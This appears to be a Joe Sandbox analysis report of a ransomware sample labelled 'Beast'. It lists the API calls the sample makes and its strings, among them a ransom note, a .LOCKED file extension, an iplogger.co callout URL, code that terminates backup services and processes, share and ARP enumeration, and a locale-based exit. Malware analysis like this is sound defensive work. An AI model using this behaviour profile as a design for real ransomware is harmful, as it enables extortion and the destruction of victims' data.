                                  • .{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED, xrefs: 005C2358
                                  • U, xrefs: 005C28F3
                                  • README.TXT, xrefs: 005C275B, 005C2855
                                  • README.TXT, xrefs: 005C2A00
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005C2771, 005C2A28
                                  • ,, xrefs: 005C25E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: File$Write$Pointer$Read$Unothrow_t@std@@@__ehfuncinfo$??2@$AttributesInfoNamedSecuritylstrcat$ByteCharCreateCriticalFreeLocalMultiSectionWidelstrcpy$CloseEnterEntriesErrorHandleLastLeaveMoveSizelstrcmp
                                  • String ID: ,$.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED$README.TXT$README.TXT$U$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$fkW
                                  • API String ID: 4009839642-3689400687
                                  • Opcode ID: 0dd1534bd91df801ddb0392f35748e6d6440f6498357abbb74689d20d0d2c247
                                  • Instruction ID: 3521cad0f114633585c8764909ec07dde0754ac4b9339947577886bbe115f99a
                                  • Opcode Fuzzy Hash: 0dd1534bd91df801ddb0392f35748e6d6440f6498357abbb74689d20d0d2c247
                                  • Instruction Fuzzy Hash: 03A28DB1608341AFE324CF64CC45FABBBE9FBC9710F104A2EF595D6291E77099408B66

                                  Control-flow Graph: function starting at 005CAF2D (graph image; legend: executed / not executed blocks)
                                  APIs
                                  • lstrlenA.KERNEL32(https://iplogger.co/155qJ4.torrent,75920F00,00000000,00000000), ref: 005CAF53
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005CAF69
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,https://iplogger.co/155qJ4.torrent,000000FF,?,00000023), ref: 005CAF8F
                                  • lstrcpyW.KERNEL32(?,00000007), ref: 005CB000
                                  • lstrcatW.KERNEL32(?), ref: 005CB014
                                  • lstrcatW.KERNEL32(?,?), ref: 005CB074
                                  • lstrlenW.KERNEL32(?,80000000,00000000), ref: 005CB083
                                  • InternetOpenUrlW.WININET(00000000,?,?,00000000), ref: 005CB099
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 005CB0C0
                                  • InternetCloseHandle.WININET(00000000), ref: 005CB0D1
                                  • InternetCloseHandle.WININET(00000000), ref: 005CB214
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Internet$CloseHandleOpenlstrcatlstrlen$ByteCharFileMultiReadWidelstrcpy
                                  • String ID: '$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$<$A$B$D$H$N$S$T$T$Y$https://iplogger.co/155qJ4.torrent$i$k$l$l$l$m$p$q$r$u$u$u$y$y$z${$}
                                  • API String ID: 3849917680-1331855335
                                  • Opcode ID: 63e5073d59fe923297169fde57ebf68cc4185695b1d4abaea4002ce87ee49fbc
                                  • Instruction ID: a34dab675d08bc6437419a5d8bc734c3a08410a5681239dd2b774955f05736d1
                                  • Opcode Fuzzy Hash: 63e5073d59fe923297169fde57ebf68cc4185695b1d4abaea4002ce87ee49fbc
                                  • Instruction Fuzzy Hash: 91B1B920D0C2CCDDEB12CBE8D848BDEBFB55F26308F085199D4947B682C6BA5649C776

                                  Control-flow Graph: function starting at 005C55DF (graph image; legend: executed / not executed blocks)
                                  APIs
                                  • GetProcessHeap.KERNEL32 ref: 005C55EE
                                    • Part of subcall function 005CABD1: GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000003), ref: 005CABE6
                                    • Part of subcall function 005CAEB5: GetSystemDefaultUILanguage.KERNEL32 ref: 005CAF09
                                    • Part of subcall function 005C8E2E: StrStrA.SHLWAPI(006D2040,?), ref: 005C8EFA
                                    • Part of subcall function 005C8E2E: GetCommandLineW.KERNEL32(?), ref: 005C8F3C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,README.TXT,000000FF,README.TXT,0000000B), ref: 005C561F
                                    • Part of subcall function 005C7413: CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000005,00000018,F0000000,?,00000000), ref: 005C751E
                                    • Part of subcall function 005C6CB5: GetComputerNameW.KERNEL32(?,?), ref: 005C6DCF
                                    • Part of subcall function 005CA0B9: LoadLibraryA.KERNEL32(NV\,?,00000000), ref: 005CA167
                                    • Part of subcall function 005CA0B9: GetProcAddress.KERNEL32(00000000), ref: 005CA1D4
                                    • Part of subcall function 005C7109: InitializeCriticalSection.KERNEL32(?,?,005C5657), ref: 005C710D
                                    • Part of subcall function 005C7109: EnterCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7114
                                    • Part of subcall function 005C7109: LeaveCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7124
                                    • Part of subcall function 005C87DD: InitializeCriticalSection.KERNEL32(006D9898,?,?,00000000), ref: 005C883F
                                    • Part of subcall function 005C87DD: lstrcpyW.KERNEL32(success,00000074,?,?,00000000), ref: 005C88B7
                                    • Part of subcall function 005C87DD: lstrcpyW.KERNEL32(out of memory,2](])]}]2];]}]0]8]0]2]/]$]],?,?,00000000), ref: 005C8971
                                  • WSAStartup.WS2_32(00000202,006D9688), ref: 005C5673
                                  • GetComputerNameW.KERNEL32(992547,?), ref: 005C568B
                                  • InitializeCriticalSection.KERNEL32(006D95CC), ref: 005C5696
                                    • Part of subcall function 005CECD9: #17.COMCTL32(?,?,00000000), ref: 005CECF7
                                    • Part of subcall function 005CECD9: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 005CECFF
                                    • Part of subcall function 005CECD9: lstrcpyW.KERNEL32(BEAST CLASS,00000000,?,?,00000000), ref: 005CEDCF
                                    • Part of subcall function 005CECD9: lstrcpyW.KERNEL32(Beast,00000000,?,?,00000000), ref: 005CEE9C
                                  • CreateMutexA.KERNEL32(00000000,00000001,?,00000000), ref: 005C58C2
                                  • WaitForSingleObject.KERNEL32(00000000), ref: 005C58C9
                                  • ExitProcess.KERNEL32 ref: 005C58D4
                                  • Sleep.KERNEL32(000003E8), ref: 005C5AB5
                                  • Sleep.KERNEL32(000003E8), ref: 005C5B0B
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005C5BB3
                                    • Part of subcall function 005C73F4: EnterCriticalSection.KERNEL32(006D99FC,006D9874,006D9A1C,005C85A2), ref: 005C73F9
                                    • Part of subcall function 005C73F4: LeaveCriticalSection.KERNEL32(006D99FC), ref: 005C7408
                                  • TranslateMessage.USER32(?), ref: 005C5B94
                                  • DispatchMessageW.USER32(?), ref: 005C5BA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CriticalSection$lstrcpy$InitializeMessage$ComputerEnterLeaveNameProcessSleep$AcquireAddressByteCharCommandContextCreateCryptDefaultDispatchExitHandleHeapInfoLanguageLibraryLineLoadLocaleModuleMultiMutexObjectProcSingleStartupSystemTranslateWaitWide
                                  • String ID: -$2$391467B9-BD4E-2B74-71A6-03A3DA3DE322$7$992547$@$@$@$@$D$F$G$H$K$K$L$L$O$O$O$P$Q$README.TXT$README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$[$\$]$^$^$a$~$~$~$~$~$~$~$~$~$~$~$~$~
                                  • API String ID: 3743700861-4111966801
                                  • Opcode ID: 3e6b85568d75ddda02adbf027140fbf37a164477f808d3bc3aeaeb7bbdd14d0d
                                  • Instruction ID: a9ddee7118e88f1a4891528b982a57be9096b37509d9c60f2ae3a1dacc8d21c4
                                  • Opcode Fuzzy Hash: 3e6b85568d75ddda02adbf027140fbf37a164477f808d3bc3aeaeb7bbdd14d0d
                                  • Instruction Fuzzy Hash: 2DF1576010D7C29ED721EBF88489B9BBFE46FA6308F08089DF1D547243DA659A49C727

                                  Control-flow Graph: function starting at 005CA0B9 (graph image; legend: executed / not executed blocks)
                                  APIs
                                  • LoadLibraryA.KERNEL32(NV\,?,00000000), ref: 005CA167
                                  • GetProcAddress.KERNEL32(00000000), ref: 005CA1D4
                                  • GetProcAddress.KERNEL32(0000000C), ref: 005CA256
                                  • GetProcAddress.KERNEL32(00000006), ref: 005CA29E
                                  • GetProcAddress.KERNEL32(?), ref: 005CA34C
                                  • GetProcAddress.KERNEL32(wHvMPQAJRK), ref: 005CA3AA
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 005CA3E9
                                  • GetProcessId.KERNEL32(00000000,?,00000000), ref: 005CA3F0
                                  • GetEnvironmentVariableW.KERNEL32(00000004,C:\Windows,00000400,?,00000000), ref: 005CA46E
                                  • FreeLibrary.KERNEL32(?,00000000), ref: 005CA47C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: AddressProc$LibraryProcess$CurrentEnvironmentFreeLoadVariable
                                  • String ID: %wPR$*$+$,$,$-$-$-$1$3$7$9$;$;$;$;$=$C:\Windows$I$NV\$Q$S$S$SnTubsuTfttjpo$V$W$W$X$X$XsMkzRoyz$]$^$wHvMPQAJRK$wNV\
                                  • API String ID: 1955238616-3862059220
                                  • Opcode ID: deb27177bac14a0e2318712c669254c5b8894e9c13eeca907b1fb4a1b97044b8
                                  • Instruction ID: a0afd5a56f220d64f34465655fd0d0748ce0c3ec50745f05b5b93e553e6331c7
                                  • Opcode Fuzzy Hash: deb27177bac14a0e2318712c669254c5b8894e9c13eeca907b1fb4a1b97044b8
                                  • Instruction Fuzzy Hash: F2E10060D092CCDEDF12CBF895887DEBFB15F26308F18509AD5947B243C2B9460ADB26

                                  Control-flow Graph: function starting at 005C6CB5 (graph image; legend: executed / not executed blocks)
                                  APIs
                                  • GetComputerNameW.KERNEL32(?,?), ref: 005C6DCF
                                  • lstrcatW.KERNEL32(?,1mm,?,?,00000000), ref: 005C6E19
                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 005C6E2D
                                  • GetUserNameW.ADVAPI32(00000000), ref: 005C6E3D
                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 005C6E81
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,00000000), ref: 005C6E94
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,00000000), ref: 005C6EA5
                                  • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,?,00000000), ref: 005C6EBA
                                  • BuildTrusteeWithSidW.ADVAPI32(006D9850,?,?,00000000), ref: 005C6EDF
                                  • InitializeCriticalSection.KERNEL32(006D9828,?,?,00000000), ref: 005C6F14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: DescriptorNameSecurity$Initialize$AccountBuildComputerCriticalDaclLookupOwnerSectionTrusteeUserWithlstrcatlstrlen
                                  • String ID: 1mm$T$U$X$Y$f$j$j$j$j$j$l$m$m$n$n$n$p$q$s$u$w$w$x${$|
                                  • API String ID: 531847068-720051323

                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • InterlockedIncrement.KERNEL32(006D9A3C), ref: 005C81D0
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 005C825A
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C82E3
                                    • Part of subcall function 005C7277: EnterCriticalSection.KERNEL32(012FFC04,00000000,006D9874,006D9A1C,?,?,?,005C816D,0000000A), ref: 005C728D
                                    • Part of subcall function 005C7277: lstrcmpW.KERNEL32(?,00000005,?,?,?,005C816D,0000000A), ref: 005C72D4
                                    • Part of subcall function 005C7277: LeaveCriticalSection.KERNEL32(012FFC04,?,?,?,005C816D,0000000A), ref: 005C73E7
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C835C
                                  • lstrcmpW.KERNEL32(?,00000070), ref: 005C8449
                                  • lstrcmpW.KERNEL32(?,README.TXT), ref: 005C8460
                                  • Sleep.KERNEL32(0000000A), ref: 005C84F2
                                  • FindNextFileW.KERNEL32(00000000,00000400), ref: 005C8510
                                  • FindClose.KERNEL32(00000000), ref: 005C851F
                                  • InterlockedDecrement.KERNEL32(006D9A3C), ref: 005C8535
                                  • Sleep.KERNEL32(00000001), ref: 005C856F
                                    • Part of subcall function 005C7277: lstrlenW.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C7313
                                    • Part of subcall function 005C7277: lstrcpyW.KERNEL32(00000000,006CAB48,?,?,?,005C816D,0000000A), ref: 005C7393
                                    • Part of subcall function 005C7277: lstrcatW.KERNEL32(00000000,?,?,?,?,005C816D,0000000A), ref: 005C739D
                                    • Part of subcall function 005C7277: EnterCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73A4
                                    • Part of subcall function 005C7277: LeaveCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73BF
                                  • Sleep.KERNEL32(0000000A), ref: 005C853F
                                  Strings
                                  Similarity
                                  • API ID: lstrcmp$CriticalSection$FindSleep$EnterFileInterlockedLeave$AllocateCloseDecrementFirstHeapIncrementNextlstrcatlstrcpylstrlen
                                  • String ID: .$1$:$README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$Z$`$`$a$d$f$p$p$p$p$q$r$u$x$y
                                  • API String ID: 2436953853-1016503251

                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrcpyW.KERNEL32(00000000,?,00000001,00000000,00000000), ref: 005CB92B
                                  • GetDriveTypeW.KERNEL32(00000000), ref: 005CB937
                                  • FindFirstVolumeW.KERNEL32(00000000,00008000), ref: 005CB96C
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(00000000,?,00000080,00000000), ref: 005CB9A1
                                  • lstrlenW.KERNEL32(?,?,00000080,00000000), ref: 005CB9B2
                                  • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 005CB9CF
                                  • FindNextVolumeW.KERNEL32(?,00000000,00008000,?,?,00000080,00000000), ref: 005CBB35
                                  • FindVolumeClose.KERNEL32(?), ref: 005CBB46
                                  Strings
                                  Similarity
                                  • API ID: Volume$Find$AllocateCloseDriveFirstHeapMountNameNamesNextPathPointTypelstrcpylstrlen
                                  • String ID: %$%$%$*$*$2$?$?$C$G$[$j$q$r$t$x$x$z
                                  • API String ID: 3806773137-3898048949

                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D95CC,?,00000000,006D95B4), ref: 005C67D8
                                  • NetShareEnum.NETAPI32(00000004,00000001,?,000000FF,?,?,?,?,00000000,006D95B4), ref: 005C67F3
                                  • LeaveCriticalSection.KERNEL32(006D95CC,?,00000000,006D95B4), ref: 005C67FC
                                  • lstrcmpiW.KERNEL32(?,00000002,?,00000000,006D95B4), ref: 005C6889
                                  • lstrcpyW.KERNEL32(00000000,006CAB48,?,00000000,006D95B4), ref: 005C68B1
                                  • StrCmpNW.SHLWAPI(?,h4h44,00000002,?,00000000,006D95B4), ref: 005C68FB
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C695D
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C6967
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C69B3
                                  • lstrcatW.KERNEL32(00000000,?,?,00000000,006D95B4), ref: 005C69BC
                                  • NetApiBufferFree.NETAPI32(?,?,00000000,006D95B4), ref: 005C6A3F
                                  Strings
                                  Similarity
                                  • API ID: lstrcat$CriticalSection$BufferEnterEnumFreeLeaveSharelstrcmpilstrcpy
                                  • String ID: &$4h4$C$F$K$O$P$T$h4h44$l$m
                                  • API String ID: 104611630-3898978471
                                  APIs
                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 005C5D6D
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 005C5D8F
                                  • inet_ntoa.WS2_32 ref: 005C5DBE
                                  • WSAGetLastError.WS2_32 ref: 005C5DC6
                                  • StrStrIA.KERNELBASE(00000000,?), ref: 005C5E20
                                  • StrStrIA.SHLWAPI(00000000,OGLPOHFP), ref: 005C5E73
                                  • StrStrIA.SHLWAPI(00000000,:8), ref: 005C5EA0
                                  • StrStrIA.SHLWAPI(00000000,?), ref: 005C5EFF
                                  Strings
                                  Similarity
                                  • API ID: Table$AllocateErrorHeapLastinet_ntoa
                                  • String ID: 2$;:8$OGLPOHFP$Q$~OO
                                  • API String ID: 3840220401-3501781245
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,005E9102), ref: 005F4225
                                  • CryptGenRandom.ADVAPI32(00000040,00000040,?), ref: 005F423A
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005F4270
                                  • CryptAcquireContextW.ADVAPI32(00000000,00000000,Intel Hardware Cryptographic Service Provider,00000016,F0000040), ref: 005F4289
                                  • CryptGenRandom.ADVAPI32(00000040,00000040,?), ref: 005F429E
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005F42D4
                                  • GlobalMemoryStatus.KERNEL32(?), ref: 005F42E4
                                  • GetCurrentProcessId.KERNEL32 ref: 005F4310
                                  Strings
                                  • Intel Hardware Cryptographic Service Provider, xrefs: 005F427D
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease$CurrentGlobalMemoryProcessStatus
                                  • String ID: Intel Hardware Cryptographic Service Provider
                                  • API String ID: 2886239813-3323058758
                                  APIs
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,00000000,?,?,005C59BB), ref: 005CA72A
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000000,?,?,005C59BB), ref: 005CA752
                                  • lstrlenW.KERNEL32(00000000,?,?,005C59BB), ref: 005CA757
                                  • lstrlenW.KERNEL32(-00000002,?,?,?,?,?,005C59BB), ref: 005CA7C0
                                  Strings
                                  Similarity
                                  • API ID: DriveLogicalStringslstrlen$AllocateHeap
                                  • String ID: ($($(
                                  • API String ID: 3376261275-3938514357
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00000028,?,00000000,00000000,?,005C64D5), ref: 005C61B5
                                  • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 005C61DC
                                  • GlobalFree.KERNEL32(00000000), ref: 005C61EB
                                  Similarity
                                  • API ID: Global$AllocFreeSocket
                                  • String ID:
                                  • API String ID: 1597759509-0
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,?,00000000), ref: 005CA590
                                  • Module32FirstW.KERNEL32(00000000,00000428), ref: 005CA5A6
                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 005CA5AF
                                  • StrStrIW.SHLWAPI(?,C:\Windows,?,00000000), ref: 005CA5C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CloseCreateFirstHandleModule32SnapshotToolhelp32
                                  • String ID: C:\Windows
                                  • API String ID: 994909291-2661751657
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,00000000,?,00000001,00000000,?,?,?,?,?,?,?,005C6DB4,?,?,00000000), ref: 005C6C56
                                  • OpenProcessToken.ADVAPI32(00000000,?,00000001,00000000,?,?,?,?,?,?,?,005C6DB4,?,?,00000000), ref: 005C6C5D
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000005,?), ref: 005C6C74
                                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,00000001,00000010,?,?,?,00000001,00000000), ref: 005C6C9D
                                  • CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 005C6CA8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                  • String ID:
                                  • API String ID: 3038321057-0
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000003), ref: 005CABE6
                                  • MessageBoxA.USER32(00000000,00000000,006CAB4A,00000010), ref: 005CAEA6
                                  • ExitProcess.KERNEL32 ref: 005CAEAE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ExitInfoLocaleMessageProcess
                                  • String ID: Xqvxssruwhg#orfdoh
                                  • API String ID: 4204081468-3373961006
                                  APIs
                                  • GetSystemInfo.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,005C5A97), ref: 005C8CAC
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                    • Part of subcall function 005C712C: EnterCriticalSection.KERNEL32(006D9A1C,00000001,00000000,005C8CEC,00000001,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7131
                                    • Part of subcall function 005C712C: LeaveCriticalSection.KERNEL32(006D9A1C,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7169
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00007E38,00000000,00000000,00000000), ref: 005C8D13
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000812D,00000001,00000000,00000000), ref: 005C8D40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CreateCriticalSectionThread$AllocateEnterHeapInfoLeaveSystem
                                  • String ID:
                                  • API String ID: 1358061742-0
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                  • FindClose.KERNEL32(00000000), ref: 005C9F70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0

                                  Control-flow Graph (image not reproduced; legend: Executed, Not Executed)
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 005CB4A6
                                  • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 005CB4BA
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                  • OpenServiceW.ADVAPI32(00000000,00000000,0000002C,00000000), ref: 005CB50D
                                  • GetLastError.KERNEL32 ref: 005CB51A
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,005C599D), ref: 005CB536
                                  • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,005C599D,?), ref: 005CB571
                                  • GetLastError.KERNEL32 ref: 005CB57F
                                  • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,005C599D,005C599D,?), ref: 005CB5B5
                                  • OpenServiceW.ADVAPI32(?,?,00000024), ref: 005CB5DF
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 005CB722
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 005CB866
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: Service$Openlstrlen$CloseDependentEnumErrorHandleLastServices$CountManagerQueryStatusTick
                                  • String ID: "$$$&$($-$5$7D0D+D4D4D!D DD$8$8KWH\$=$=$AcronisAgent$B$D7+4 $K$K8L8W8H8H8]8\88$[$j$k$k$k$m$m$n$q$q$z${${$}$}$~
                                  • API String ID: 3449900727-1055701911

                                  Control-flow Graph (image not reproduced; legend: Executed, Not Executed)
                                  APIs
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,00000000), ref: 005CB23E
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 005CB258
                                  • CloseHandle.KERNEL32(00000000), ref: 005CB404
                                    • Part of subcall function 005C10F6: lstrcmpiW.KERNEL32(?,00000000,00000000,75920880,00000000,006D99B4,?,005C847E), ref: 005C1116
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005CB28D
                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 005CB2A0
                                  • CloseHandle.KERNEL32(00000000), ref: 005CB3E6
                                  • Process32NextW.KERNEL32(00000000,?), ref: 005CB3F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: lstrlen$CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                  • String ID: !$!$&$&$)$*$;$Q$`$`$a$agntsvc.exe$d$d$f$h$k$l$m$p$q$q$s$t$t$t$v$w
                                  • API String ID: 2831976363-435690770

                                  Control-flow Graph (image not reproduced; legend: Executed, Not Executed)
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • Sleep.KERNEL32(00000001), ref: 005C8078
                                    • Part of subcall function 005C7234: EnterCriticalSection.KERNEL32(006D9A1C,00000000,006D9A1C,005C81BD), ref: 005C7239
                                    • Part of subcall function 005C7234: LeaveCriticalSection.KERNEL32(006D9A1C), ref: 005C726C
                                  • InterlockedIncrement.KERNEL32(006D9A3C), ref: 005C7EB4
                                    • Part of subcall function 005C1A4D: GetFileAttributesW.KERNEL32(00000000,75920F00,00000000,00000000), ref: 005C1A7F
                                    • Part of subcall function 005C1A4D: SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1A97
                                    • Part of subcall function 005C1A4D: SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1AAA
                                    • Part of subcall function 005C1A4D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1ABE
                                    • Part of subcall function 005C1A4D: GetLastError.KERNEL32 ref: 005C1ACA
                                    • Part of subcall function 005C1A4D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1AFB
                                  • EnterCriticalSection.KERNEL32(012FFC04), ref: 005C7F30
                                  • LeaveCriticalSection.KERNEL32(?), ref: 005C7F8D
                                  • EnterCriticalSection.KERNEL32(006DA3EC), ref: 005C7FBD
                                  • PostMessageW.USER32(0000069C,00000000,success), ref: 005C7FD0
                                  • PostMessageW.USER32(00000405,00000000,00000000), ref: 005C7FE5
                                  • LeaveCriticalSection.KERNEL32(006DA3EC), ref: 005C7FF1
                                  • EnterCriticalSection.KERNEL32(006DA3EC), ref: 005C8018
                                  • PostMessageW.USER32(0000069B,00000000,00000000), ref: 005C802D
                                  • LeaveCriticalSection.KERNEL32(006DA3EC), ref: 005C8034
                                  • Sleep.KERNEL32(00000001), ref: 005C803C
                                  • InterlockedDecrement.KERNEL32(006D9A3C), ref: 005C8051
                                  • Sleep.KERNEL32(0000000A), ref: 005C805B
